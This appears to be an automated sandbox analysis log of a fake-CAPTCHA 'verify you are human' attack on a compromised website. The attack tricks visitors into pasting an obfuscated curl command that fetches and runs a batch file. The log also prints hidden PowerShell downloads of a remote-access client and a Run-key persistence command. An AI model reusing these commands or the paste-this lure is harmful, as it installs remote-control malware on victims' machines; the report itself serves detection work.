                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 111603E3 appears 41 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97D00 appears 120 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC830A0 appears 48 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 1105DD10 appears 291 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11081BB0 appears 44 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11164010 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CCAF3CB appears 31 times
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.win@57/404@120/19
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11059C50 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11089150 FindResourceA,LoadResource,LockResource
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Mutant created: NULL
Source: C:\Windows\System32\osk.exe Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz3rpg3v.cj5.ps1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: chrome.exe, 00000000.00000002.2473488281.000028EC02ABE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: C:\Windows\System32\osk.exe Section loaded: osksupport.dll, dwmapi.dll, oleacc.dll, winmm.dll, wmsgapi.dll, duser.dll, dui70.dll, kernel.appcore.dll, uxtheme.dll, winmmbase.dll, mmdevapi.dll, devobj.dll, ksuser.dll, avrt.dll, audioses.dll, powrprof.dll, umpdc.dll, msacm32.dll, midimap.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, twinapi.dll, xmllite.dll, hid.dll, mstextprediction.dll, policymanager.dll, msvcp110_win.dll, uiautomationcore.dll, propsys.dll, sxs.dll, uiamanager.dll, bcp47langs.dll, dwrite.dll, windowscodecs.dll, windows.storage.dll, wldp.dll, onecorecommonproxystub.dll, actxprxy.dll, atlthunk.dll, cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll, osksupport.dll, secur32.dll, mlang.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll, sspicli.dll, iphlpapi.dll, mswsock.dll, kernel.appcore.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: osksupport.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Options\NSM.ini
                                  Source: C:\Windows\System32\rundll32.exe Window found: window name: SysTabControl32
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                  Source: Window Recorder Window detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp

                                  Data Obfuscation

                                  Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
                                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID
                                  Source: PCICL32.DLL.34.dr Static PE information: section name: .hhshare
                                  Source: msvcr100.dll.34.dr Static PE information: section name: .text entropy: 6.909044922675825

                                  Persistence and Installation Behavior

                                  Source: Chrome DOM: 0.2 OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 8ed10zeshpn Performance and security by Cloudflare
                                  Source: screenshot OCR Text: e about:blank -8 x Home Fountain of Health X fountainofhealth.ca/en o x Keyboard Properties Speed Hardware Character repeat Repeat delay .ca Long Short completing the action below Repeat rate: Slow Fast 5 Click here and hold down a keyto test repeat rate: view the security of your connection before proceeding. Cursor blink rate Fast None Complete these verification steps Lise keyboard To prove you are not robot Bopiy Canc 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
                                  Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Ent
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
